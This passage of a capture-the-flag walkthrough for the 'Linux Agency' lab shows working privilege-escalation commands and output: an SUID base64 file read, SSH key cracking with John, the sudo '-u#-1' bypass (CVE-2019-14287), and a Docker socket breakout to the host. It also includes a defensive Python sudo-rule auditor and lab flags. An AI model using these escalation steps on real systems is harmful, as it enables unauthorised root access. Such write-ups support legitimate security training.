-rw-r--r--  1 penelope penelope   220 Jan 12  2021 .bash_logout
-rw-r--r--  1 penelope penelope  3771 Jan 12  2021 .bashrc
-rw-r--r--  1 penelope penelope  8980 Jan 12  2021 examples.desktop
-r--------  1 penelope penelope    43 Jan 12  2021 flag.txt
drwx------  3 penelope penelope  4096 Jan 12  2021 .gnupg
-rw-r--r--  1 penelope penelope   807 Jan 12  2021 .profile
penelope@linuxagency:~$ cat flag.txt 
penelope{2da1c2e9d2bd0004556ae9e107c1d222}
penelope@linuxagency:~$ 

penelope flag

penelope{2da1c2e9d2bd0004556ae9e107c1d222}

Question 9 – What is maya’s flag?

  • As per the above screenshot of the directory listing for user penelope, we can see a base64 binary that is owned by the user maya and has the SUID bit set. I used GTFObins to exploit this binary to read the flag from maya’s home directory.

penelope@linuxagency:~$ ls -la
total 80
drwxr-x---  3 penelope penelope  4096 Jan 12  2021 .
drwxr-xr-x 45 root     root      4096 Jan 12  2021 ..
-rwsr-sr-x  1 maya     maya     39096 Jan 12  2021 base64
lrwxrwxrwx  1 penelope penelope     9 Jan 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 penelope penelope   220 Jan 12  2021 .bash_logout
-rw-r--r--  1 penelope penelope  3771 Jan 12  2021 .bashrc
-rw-r--r--  1 penelope penelope  8980 Jan 12  2021 examples.desktop
-r--------  1 penelope penelope    43 Jan 12  2021 flag.txt
drwx------  3 penelope penelope  4096 Jan 12  2021 .gnupg
-rw-r--r--  1 penelope penelope   807 Jan 12  2021 .profile

penelope@linuxagency:~$ LFILE=/home/maya/flag.txt
penelope@linuxagency:~$ ./base64 "$LFILE" | base64 --decode
maya{a66e159374b98f64f89f7c8d458ebb2b}
penelope@linuxagency:~$ 

penelope directory

GTFObins SUID

maya flag

maya{a66e159374b98f64f89f7c8d458ebb2b}

Question 10 – What is robert’s Passphrase?

  • Once we are in maya’s home directory, we can see a file named elusive_targets.txt, which reveals that Robert is illegally hacking into our server and that we can gain access to his account with an old SSH password backup kept in a directory called old_robert_ssh. Peeking into the directory reveals robert’s public and private SSH key pair. I copied the private key to the local machine and used ssh2john to convert it into a format John can crack. Firing up John on it reveals the password – industryweapon

maya directory

cat elusive_targets.txt

SSH keys

root@ip-10-10-230-84:/opt/john# ./ssh2john.py id_rsa > id_rsa.hash

root@ip-10-10-230-84:/# john --wordlist=/usr/share/wordlists/rockyou.txt /opt/john/id_rsa.hash 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
industryweapon   (id_rsa)
1g 0:00:00:16 DONE (2023-06-20 20:46) 0.06093g/s 873960p/s 873960c/s 873960C/s *7¡Vamos!
Session completed.

ssh2john.py
John cracking

industryweapon

Question 11 – What is user.txt?

  • Once I got robert’s password, I tried to SSH into the server with it, but no luck. Then, from maya’s shell, I checked the listening ports and internal services. There I found a service listening on port 2222 on 127.0.0.1 of the machine. I tried to SSH into it and succeeded. Now it was time to claim the user flag, but it was just a troll.

maya@linuxagency:~$ ss -tulnp
Netid State   Recv-Q   Send-Q          Local Address:Port      Peer Address:Port  
udp   UNCONN  6144     0               127.0.0.53%lo:53             0.0.0.0:*     
udp   UNCONN  0        0           10.10.62.203%eth0:68             0.0.0.0:*     
udp   UNCONN  4992     0                     0.0.0.0:68             0.0.0.0:*     
udp   UNCONN  0        0                     0.0.0.0:631            0.0.0.0:*     
udp   UNCONN  25856    0                     0.0.0.0:5353           0.0.0.0:*     
udp   UNCONN  0        0                     0.0.0.0:59125          0.0.0.0:*     
udp   UNCONN  0        0                        [::]:47368             [::]:*     
udp   UNCONN  8448     0                        [::]:5353              [::]:*     
tcp   LISTEN  0        128                 127.0.0.1:2222           0.0.0.0:*     
tcp   LISTEN  0        128                 127.0.0.1:80             0.0.0.0:*     
tcp   LISTEN  0        128             127.0.0.53%lo:53             0.0.0.0:*     
tcp   LISTEN  0        128                   0.0.0.0:22             0.0.0.0:*     
tcp   LISTEN  0        5                   127.0.0.1:631            0.0.0.0:*     
tcp   LISTEN  0        128                 127.0.0.1:41791          0.0.0.0:*     
tcp   LISTEN  0        128                      [::]:22                [::]:*     
tcp   LISTEN  0        5                       [::1]:631               [::]:*     
maya@linuxagency:~$ ssh -p 2222 [email protected]
[email protected]'s password: 
Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1
robert@ec96850005d6:~$ ls
robert.txt
robert@ec96850005d6:~$ cat robert.txt 
You shall not pass from here!!!

I will not allow ICA to take over my world.

SSH tunneling

  • Next, I checked for any sudo misconfiguration and found that robert can run /bin/bash as any user other than root; I have seen this type of configuration before. To cross-check, I downloaded linpeas onto the target machine and fired it up. It showed that the sudo version is vulnerable to CVE-2019-14287. With the one-liner, I got a root shell and claimed the user flag there, but the root flag was still hiding somewhere.

vulnerable sudo version - Linpeas output

robert@ec96850005d6:/tmp$ sudo -u#-1 /bin/bash
root@ec96850005d6:/tmp# id
uid=0(root) gid=1000(robert) groups=1000(robert)
root@ec96850005d6:/tmp# cd /root
root@ec96850005d6:/root# ls
success.txt  user.txt
root@ec96850005d6:/root# cat user.txt 
user{620fb94d32470e1e9dcf8926481efc96}
root@ec96850005d6:/root# cat success.txt 
47 you made it!!!

You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.

Good Luck Amigo!
root@ec96850005d6:/root# 

user flag

user{620fb94d32470e1e9dcf8926481efc96}
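The sudo -l listings in Questions 3 to 7 and the "anyone but root" rule exploited here can be audited in one pass over the privilege lines. This is an added example, not the room's or the author's code; the robert rule, the sudo version string and the short SHELL_CAPABLE list are assumptions made for the demonstration.

```python
import re
from typing import NamedTuple

# Constructed input: the privilege lines from the `sudo -l` listings above. The
# robert line is an assumed rendering of the rule the page only describes.
SAMPLE_RULES = {
    "dalia": "(silvio) NOPASSWD: /usr/bin/zip",
    "silvio": "(reza) SETENV: NOPASSWD: /usr/bin/git",
    "reza": "(jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py",
    "jordan": "(ken) NOPASSWD: /usr/bin/less",
    "ken": "(sean) NOPASSWD: /usr/bin/vim",
    "robert": "(ALL, !root) NOPASSWD: /bin/bash",
}
SAMPLE_VERSION = "Sudo version 1.8.27"  # constructed; the page gives no version

# Programs this page shows handing out a shell, plus shells themselves.
# Illustrative only; GTFOBins lists many more.
SHELL_CAPABLE = {"zip", "git", "less", "vim", "sh", "bash"}
FIXED_IN = (1, 8, 28)  # first sudo release with the CVE-2019-14287 fix
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


class Finding(NamedTuple):
    user: str
    code: str
    detail: str


def parse_version(text):
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"no sudo version in {text!r}")
    return tuple(int(part) for part in match.groups())


def audit_rule(user, rule, version):
    match = RULE.match(rule)
    if not match:
        return []
    # Runas user list: the part before an optional ":group" section.
    runas = [item.strip() for item in match.group(1).split(":")[0].split(",")]
    tags = set(re.findall(r"[A-Z]+", match.group(2)))
    found = []
    for command in match.group(3).split(","):
        words = command.split()
        program = words[0].rsplit("/", 1)[-1] if words else ""
        if program in SHELL_CAPABLE:
            found.append(Finding(user, "shell-capable",
                                 f"{program} can start a shell as the runas user"))
    if "SETENV" in tags:
        found.append(Finding(user, "setenv",
                             "caller may set PAGER, PYTHONPATH and similar"))
    if "ALL" in runas and any(item.startswith("!") for item in runas):
        if version < FIXED_IN:
            found.append(Finding(user, "cve-2019-14287",
                                 "runas exclusion is bypassable on this sudo"))
        else:
            found.append(Finding(user, "runas-denylist",
                                 "name the permitted users instead of ALL, !x"))
    return found


def audit(rules, version_text):
    version = parse_version(version_text)
    return [finding for user, rule in rules.items()
            for finding in audit_rule(user, rule, version)]


if __name__ == "__main__":
    for finding in audit(SAMPLE_RULES, SAMPLE_VERSION):
        print(f"{finding.user:7} {finding.code:15} {finding.detail}")
```

Distribution packages often backport the fix without changing the upstream version number, so confirm the result against the package changelog.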

Question 12 – What is root.txt?

  • The root flag was harder than leg day at the gym. The hint talks about some Blue Whale, which I assumed meant Docker. So, I blindly copy-pasted the Docker breakout commands from HackTricks and eventually got a root shell. Moving into the root directory reveals the root flag.

root@ec96850005d6:~# find / -name docker.sock 2>/dev/null
/run/docker.sock
root@ec96850005d6:~# /tmp/docker images #lucky they left this executable in the /tmp dir ;)
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
mangoman            latest              b5f279024ce0        2 years ago         213MB
root@ec96850005d6:~# /tmp/docker run -it -v /:/host/ mangoman chroot /host/ bash
root@e0c9b28abd75:/# ls
bin   cdrom  etc       home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  dev    flag.txt  initrd.img  lib             lost+found  mnt    proc  run   snap  swapfile  tmp  var
root@e0c9b28abd75:/# cd root/
root@e0c9b28abd75:~# ls
message.txt  root.txt
root@e0c9b28abd75:~# cat root.txt 
root{62ca2110ce7df377872dd9f0797f8476}
root@e0c9b28abd75:~# 

root flag

root{62ca2110ce7df377872dd9f0797f8476}


Conclusion:


So that was “Linux Agency” for you. Quite a long read, I must say. Well, let’s sum up the room. We started with initial SSH access on the box. Next, we solved a series of missions and got the flag for the user viktor. The privilege escalation consists of a chain of users, one at each stage. We tried quite a few techniques and at last broke out of the container to get the root flag and freedom from Big Brother.
